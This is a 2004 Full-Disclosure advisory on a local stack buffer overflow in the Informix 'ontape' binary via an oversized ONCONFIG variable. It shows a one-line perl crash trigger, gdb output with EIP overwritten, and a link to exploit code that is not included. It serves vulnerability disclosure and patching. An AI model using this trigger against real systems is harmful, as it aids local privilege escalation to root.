From pask@open3s.com Thu Jan 29 20:44:52 2004 From: pask@open3s.com To: "[Full Disclosure]" Date: Tue, 27 Jan 2004 15:31:51 +0100 (CET) Subject: [Full-Disclosure] OPEN3S-2003-08-08-eng-informix-ontape ----------========== OPEN3S-2003-08-08-eng-informix-ontape ==========---------- Title: Local Vulnerability at Informix IDSv9.40 via ontape binary Date: 08-08-2003 Platform: Only tested in Linux but can be exported to others. Impact: Any user with DSA privileges over Informix could achieve root privileges through a stack buffer overflow in ontape binary Author: Juan Manuel Pascual Escriba pask@open3s.com Status: Solved by IBM Corp. PROBLEM SUMMARY: Stack Buffer overflow exists in ONCONFIG environment variable read process when it's bigger than 495 bytes. [informix@dimoni bin]$ export ONCONFIG=`perl -e 'print "A"x495'` [informix@dimoni bin]$ ./ontape WARNING: Cannot access configuration file $INFORMIXDIR/etc/$ONCONFIG. Segmentation fault [pask@dimoniet bin]$ gdb ./ontape (gdb) r WARNING: Cannot access configuration file $INFORMIXDIR/etc/$ONCONFIG. Segmentation fault (gdb) info reg eax 0xffffffff -1 ecx 0x40083580 1074279808 edx 0x46 70 ebx 0x1 1 esp 0xbfff74a0 0xbfff74a0 ebp 0x41414141 0x41414141 esi 0xbfff74cc -1073777460 edi 0x0 0 eip 0x41414141 0x41414141 It's posible to achieve root privileges through this buffer overflow. IMPACT: Any user with exec permision over ontape could achieve root privileges. In my default installation only users with DSA privileges can exec this binary. SOLUTION: See more infomartion about this vulnerability and workaround at: http://www-1.ibm.com/support/docview.wss?uid=swg21153336 STATUS Reported to IBM security team at 11th of August 2003 See more infomartion about this vulnerability and workaround at: http://www-1.ibm.com/support/docview.wss?uid=swg21153336 This vulnerability was managed in an efficient manner by Jonathan Leffler from IBM Informix Database Engineering Team. EXPLOIT http://www.open3s.com/exploits/OPEN3S-2003-08-08-eng-informix-ontape.c -------------------------------------------------- This vulnerability was researched by: Juan Manuel Pascual Escriba pask@open3s.com Barcelona - Spain http://www.open3s.com -- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html